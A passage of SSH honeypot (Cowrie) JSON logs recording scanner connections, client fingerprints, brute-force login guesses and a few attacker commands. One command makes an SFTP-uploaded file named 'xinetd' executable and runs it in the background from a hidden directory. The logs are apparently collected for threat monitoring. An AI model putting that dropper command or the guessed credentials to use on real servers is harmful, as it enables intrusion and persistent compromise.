c"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:21:57.208379Z","src_ip":"212.227.235.229","session":"1faf5607fd70"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:21:58.929125Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.command.input","input":"ps aux | head -10","message":"CMD: ps aux | head -10","sensor":"my-vps","timestamp":"2025-08-31T01:21:58.929866Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","size":28,"shasum":"e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/e8be2a33d35f6395190677f974f883a954cc7563973bba82e50fbe1f8c81d767 after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:00.124089Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.session.closed","duration":"11.4","message":"Connection lost after 11.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:00.224976Z","src_ip":"212.227.125.160","session":"3dd2efcc4b1f"}
{"eventid":"cowrie.login.failed","username":"dev","password":"abc123","message":"login attempt [dev/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:03.018723Z","src_ip":"212.227.235.229","session":"1faf5607fd70"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:04.980974Z","src_ip":"212.227.235.229","session":"1faf5607fd70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":61144,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ba83e44b1a2","protocol":"ssh","message":"New connection: 212.227.235.229:61144 (1.2.3.4:22) [session: 8ba83e44b1a2]","sensor":"my-vps","timestamp":"2025-08-31T01:22:05.076720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:22:05.077342Z","src_ip":"212.227.235.229","session":"8ba83e44b1a2"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:22:05.205340Z","src_ip":"212.227.235.229","session":"8ba83e44b1a2"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:05.834646Z","src_ip":"212.227.235.229","session":"8ba83e44b1a2"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:06.964200Z","src_ip":"212.227.235.229","session":"8ba83e44b1a2"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":56474,"dst_ip":"1.2.3.4","dst_port":22,"session":"03884a86ee1e","protocol":"ssh","message":"New connection: 201.148.180.50:56474 (1.2.3.4:22) [session: 03884a86ee1e]","sensor":"my-vps","timestamp":"2025-08-31T01:22:08.946593Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:22:09.612921Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:22:09.613774Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.login.success","username":"root","password":"100@Tailan","message":"login attempt [root/100@Tailan] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:22:18.618026Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46474,"dst_ip":"1.2.3.4","dst_port":22,"session":"7754ea56d161","protocol":"ssh","message":"New connection: 212.227.125.160:46474 (1.2.3.4:22) [session: 7754ea56d161]","sensor":"my-vps","timestamp":"2025-08-31T01:22:18.720067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:22:19.256814Z","src_ip":"212.227.125.160","session":"7754ea56d161"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:22:19.257542Z","src_ip":"212.227.125.160","session":"7754ea56d161"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:22:21.158497Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-31T01:22:21.159234Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1213,"dst_ip":"1.2.3.4","dst_port":22,"session":"678cbd5b20f4","protocol":"ssh","message":"New connection: 102.88.137.80:1213 (1.2.3.4:22) [session: 678cbd5b20f4]","sensor":"my-vps","timestamp":"2025-08-31T01:22:21.345382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:22:21.346250Z","src_ip":"102.88.137.80","session":"678cbd5b20f4"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:22:21.469118Z","src_ip":"102.88.137.80","session":"678cbd5b20f4"}
{"eventid":"cowrie.login.failed","username":"dev","password":"abc123","message":"login attempt [dev/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:21.593612Z","src_ip":"212.227.125.160","session":"7754ea56d161"}
{"eventid":"cowrie.login.failed","username":"strapi","password":"strapi","message":"login attempt [strapi/strapi] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:22.001225Z","src_ip":"102.88.137.80","session":"678cbd5b20f4"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:23.125021Z","src_ip":"102.88.137.80","session":"678cbd5b20f4"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:23.255424Z","src_ip":"212.227.125.160","session":"7754ea56d161"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:24.150060Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.session.closed","duration":"15.2","message":"Connection lost after 15.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:24.160808Z","src_ip":"201.148.180.50","session":"03884a86ee1e"}
{"eventid":"cowrie.session.file_upload","filename":"xinetd","outfile":"var/lib/cowrie/downloads/b9e643a8e78d2ce745fbe73eb505c8a0cc49842803077809b2267817979d10b0","shasum":"b9e643a8e78d2ce745fbe73eb505c8a0cc49842803077809b2267817979d10b0","message":"SFTP Uploaded file \"xinetd\" to var/lib/cowrie/downloads/b9e643a8e78d2ce745fbe73eb505c8a0cc49842803077809b2267817979d10b0","sensor":"my-vps","timestamp":"2025-08-31T01:22:39.604778Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:22:40.285887Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.command.input","input":"chmod +x ./.5039203499273574195/xinetd;nohup ./.5039203499273574195/xinetd  &","message":"CMD: chmod +x ./.5039203499273574195/xinetd;nohup ./.5039203499273574195/xinetd  &","sensor":"my-vps","timestamp":"2025-08-31T01:22:40.286564Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4bd13e8426af0eab063bf7199aacd93d60b5f220b6ceb3885b0e2752d7afd4c1","size":138,"shasum":"4bd13e8426af0eab063bf7199aacd93d60b5f220b6ceb3885b0e2752d7afd4c1","duplicate":false,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/4bd13e8426af0eab063bf7199aacd93d60b5f220b6ceb3885b0e2752d7afd4c1 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:40.507903Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.session.closed","duration":"284.1","message":"Connection lost after 284.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:40.509315Z","src_ip":"212.227.125.160","session":"65ea4d37e44a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:48.412834Z","src_ip":"115.190.94.119","session":"0e551f89911a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63079,"dst_ip":"1.2.3.4","dst_port":22,"session":"16ae8e438479","protocol":"ssh","message":"New connection: 212.227.125.160:63079 (1.2.3.4:22) [session: 16ae8e438479]","sensor":"my-vps","timestamp":"2025-08-31T01:22:50.789556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T01:22:50.790481Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T01:22:50.875389Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam","message":"login attempt [sam/sam] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:51.293580Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1","message":"login attempt [sam/sam1] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:52.379703Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam123","message":"login attempt [sam/sam123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:53.466194Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam1234","message":"login attempt [sam/sam1234] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:54.551850Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.login.failed","username":"sam","password":"sam12345","message":"login attempt [sam/sam12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:22:55.639410Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:22:56.725584Z","src_ip":"212.227.125.160","session":"16ae8e438479"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37558,"dst_ip":"1.2.3.4","dst_port":22,"session":"6261f5d55992","protocol":"ssh","message":"New connection: 212.227.235.229:37558 (1.2.3.4:22) [session: 6261f5d55992]","sensor":"my-vps","timestamp":"2025-08-31T01:22:59.278218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:23:00.063619Z","src_ip":"212.227.235.229","session":"6261f5d55992"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:23:00.064376Z","src_ip":"212.227.235.229","session":"6261f5d55992"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:23:06.097126Z","src_ip":"212.227.235.229","session":"6261f5d55992"}
{"eventid":"cowrie.session.closed","duration":"9.7","message":"Connection lost after 9.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:23:08.930168Z","src_ip":"212.227.235.229","session":"6261f5d55992"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56726,"dst_ip":"1.2.3.4","dst_port":22,"session":"205ebe68cbb2","protocol":"ssh","message":"New connection: 212.227.125.160:56726 (1.2.3.4:22) [session: 205ebe68cbb2]","sensor":"my-vps","timestamp":"2025-08-31T01:23:22.160617Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:23:22.666085Z","src_ip":"212.227.125.160","session":"205ebe68cbb2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:23:22.666869Z","src_ip":"212.227.125.160","session":"205ebe68cbb2"}
{"eventid":"cowrie.login.failed","username":"developer","password":"123456","message":"login attempt [developer/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:23:25.183806Z","src_ip":"212.227.125.160","session":"205ebe68cbb2"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:23:26.724558Z","src_ip":"212.227.125.160","session":"205ebe68cbb2"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":17418,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a772c7096a9","protocol":"ssh","message":"New connection: 102.88.137.80:17418 (1.2.3.4:22) [session: 1a772c7096a9]","sensor":"my-vps","timestamp":"2025-08-31T01:23:31.685368Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:23:31.686305Z","src_ip":"102.88.137.80","session":"1a772c7096a9"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:23:31.808903Z","src_ip":"102.88.137.80","session":"1a772c7096a9"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123654","message":"login attempt [ubuntu/123654] failed","sensor":"my-vps","timestamp":"2025-08-31T01:23:32.365046Z","src_ip":"102.88.137.80","session":"1a772c7096a9"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:23:33.490130Z","src_ip":"102.88.137.80","session":"1a772c7096a9"}
